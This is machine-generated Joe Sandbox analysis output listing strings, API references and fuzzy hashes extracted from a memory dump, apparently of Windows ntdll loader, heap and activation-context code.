                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01408D8C
                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01408DA3
                                                              • The instruction at %p referenced memory at %p., xrefs: 01408EE2
                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 01408E02
                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 01408F3F
                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01408DD3
                                                              • *** Inpage error in %ws:%s, xrefs: 01408EC8
                                                              • The resource is owned shared by %d threads, xrefs: 01408E2E
                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01408F2D
                                                              • <unknown>, xrefs: 01408D2E, 01408D81, 01408E00, 01408E49, 01408EC7, 01408F3E
                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01408F34
                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01408E4B
                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01408DB5
                                                              • *** then kb to get the faulting stack, xrefs: 01408FCC
                                                              • Go determine why that thread has not released the critical section., xrefs: 01408E75
                                                              • an invalid address, %p, xrefs: 01408F7F
                                                              • The resource is owned exclusively by thread %p, xrefs: 01408E24
                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01408E3F
                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01408FEF
                                                              • read from, xrefs: 01408F5D, 01408F62
                                                              • *** enter .exr %p for the exception record, xrefs: 01408FA1
                                                              • The instruction at %p tried to %s , xrefs: 01408F66
                                                              • The critical section is owned by thread %p., xrefs: 01408E69
                                                              • write to, xrefs: 01408F56
                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01408DC4
                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01408E86
                                                              • This failed because of error %Ix., xrefs: 01408EF6
                                                              • *** enter .cxr %p for the context, xrefs: 01408FBD
                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01408F26
                                                              • a NULL pointer, xrefs: 01408F90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • API String ID: 0-108210295
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              Strings
                                                              • Thread identifier, xrefs: 013C553A
                                                              • undeleted critical section in freed memory, xrefs: 013C542B
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54CE
                                                              • 8, xrefs: 013C52E3
                                                              • Address of the debug info found in the active list., xrefs: 013C54AE, 013C54FA
                                                              • double initialized or corrupted critical section, xrefs: 013C5508
                                                              • Invalid debug info address of this critical section, xrefs: 013C54B6
                                                              • Critical section address, xrefs: 013C5425, 013C54BC, 013C5534
                                                              • Critical section debug info address, xrefs: 013C541F, 013C552E
                                                              • Critical section address., xrefs: 013C5502
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 013C5543
                                                              • corrupted critical section, xrefs: 013C54C2
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C540A, 013C5496, 013C5519
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54E2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • API String ID: 0-2368682639
                                                              Strings
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013C25EB
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 013C2409
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 013C2412
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013C22E4
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013C24C0
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 013C261F
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 013C2506
                                                              • @, xrefs: 013C259B
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 013C2602
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 013C2624
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 013C2498
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • API String ID: 0-4009184096
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-3197712848
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              Strings
                                                              • AVRF: -*- final list of providers -*- , xrefs: 013D8B8F
                                                              • VerifierDlls, xrefs: 013D8CBD
                                                              • VerifierDebug, xrefs: 013D8CA5
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 013D8A67
                                                              • HandleTraces, xrefs: 013D8C8F
                                                              • VerifierFlags, xrefs: 013D8C50
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 013D8A3D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • API String ID: 0-3223716464
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              Strings
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013A99ED
                                                              • LdrpInitShimEngine, xrefs: 013A99F4, 013A9A07, 013A9A30
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 013A9A01
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013A9A2A
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013A9A11, 013A9A3A
                                                              • apphelp.dll, xrefs: 01346496
                                                              Strings
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 013C2180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 013C2160, 013C219A, 013C21BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 013C219F
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013C21BF
                                                              • SXS: %s() passed the empty activation context, xrefs: 013C2165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 013C2178
                                                              Strings
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 013C81E5
                                                              • Loading import redirection DLL: '%wZ', xrefs: 013C8170
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013C8181, 013C81F5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0138C6C3
                                                              • LdrpInitializeProcess, xrefs: 0138C6C4
                                                              • LdrpInitializeImportRedirection, xrefs: 013C8177, 013C81EB
                                                              APIs
                                                                • Part of subcall function 01392DF0: LdrInitializeThunk.NTDLL ref: 01392DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01390D74
                                                              Strings
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              Strings
                                                              • @, xrefs: 01388591
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01388421
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0138855E
                                                              • LdrpInitializeProcess, xrefs: 01388422
                                                              Strings
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013C22B6
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013C21D9, 013C22B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 013C21DE
                                                              • .Local, xrefs: 013828D8
                                                              Strings
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 013C3456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 013C342A
                                                              • RtlDeactivateActivationContext, xrefs: 013C3425, 013C3432, 013C3451
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 013C3437
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 013B0FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013B10AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 013B106B
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 013B1028
                                                              Strings
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 013C362F
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 013C3640, 013C366C
                                                              • LdrpFindDllActivationContext, xrefs: 013C3636, 013C3662
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 013C365C
                                                              Strings
                                                              • LdrpDynamicShimModule, xrefs: 013BA998
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013BA9A2
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013BA992
                                                              • apphelp.dll, xrefs: 01372462
                                                              Strings
                                                              • HEAP: , xrefs: 01363264
                                                              • HEAP[%wZ]: , xrefs: 01363255
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0136327D
                                                              Strings
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              • String ID: $@
                                                              Strings
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              Strings
                                                              • LdrpCheckModule, xrefs: 013BA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013BA121
                                                              • Failed to allocated memory for shimmed module list, xrefs: 013BA10F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 013C82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013C82E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 013C82DE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0140C1C5
                                                              • PreferredUILanguages, xrefs: 0140C212
                                                              • @, xrefs: 0140C1F1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013D4899
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 013D4888
                                                              • LdrpCheckRedirection, xrefs: 013D488F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              Strings
                                                              • Process initialization failed with status 0x%08lx, xrefs: 013D20F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013D2104
                                                              • LdrpInitializationFailure, xrefs: 013D20FA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              Strings
                                                              • LdrResSearchResource Exit, xrefs: 0135AA25
                                                              • LdrResSearchResource Enter, xrefs: 0135AA13
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              Strings
                                                              • kLsE, xrefs: 01350540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0135063D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0135A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0135A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 013D895E
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                                                              • Instruction ID: 35e52dcbc068908490bbe3f09d2d076b611e598fa2b6174c1401e5c82bf330aa
                                                              • Opcode Fuzzy Hash: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                                                              • Instruction Fuzzy Hash: A401F737200201ABEB206F59F884E5A7B65FF8565CB04046DF68116562CB30B841CB92
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                                                              • Instruction ID: 167608ac8cc13abbe687d0fb63d511ec492317eb8a18429a84107ef05f91803d
                                                              • Opcode Fuzzy Hash: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                                                              • Instruction Fuzzy Hash: DA42D276608341DFEB25CF68C890A6BBBE5BF88308F48492DFB8697250D771D845CB52
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                                                              • Instruction ID: f96f581ec3fdc0678978ecbcbb9f436f1713e0eb0c985344808ce5988c7e8208
                                                              • Opcode Fuzzy Hash: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                                                              • Instruction Fuzzy Hash: CB424975E003298FEB25CF69C885BADBBF5BF48314F1480D9E949AB282D7349985CF50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                                                              • Instruction ID: d5dd5b80df4e7e479111b9e9a468156bcae3a65fb04a9c44110cec4091a04465
                                                              • Opcode Fuzzy Hash: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                                                              • Instruction Fuzzy Hash: B732E2B0A007598FDB25CF69C8857FEBBF6BF84308F14811DD6469BA86E735A811CB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                                                              • Instruction ID: fc6ab360043b07fe8bcfba83c6526d1a44babf541cc38d0730d6ca2917e62c38
                                                              • Opcode Fuzzy Hash: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                                                              • Instruction Fuzzy Hash: F522CD742046658BEB25CF2DC094772BBF1AF44348F08849EEB8E8F686D735E456DB60
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
                                                              • Instruction ID: d06b1a0fd0afde0dcb3786e97bc6a953dda065d3b5bb5e5b5359ad04c373c231
                                                              • Opcode Fuzzy Hash: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
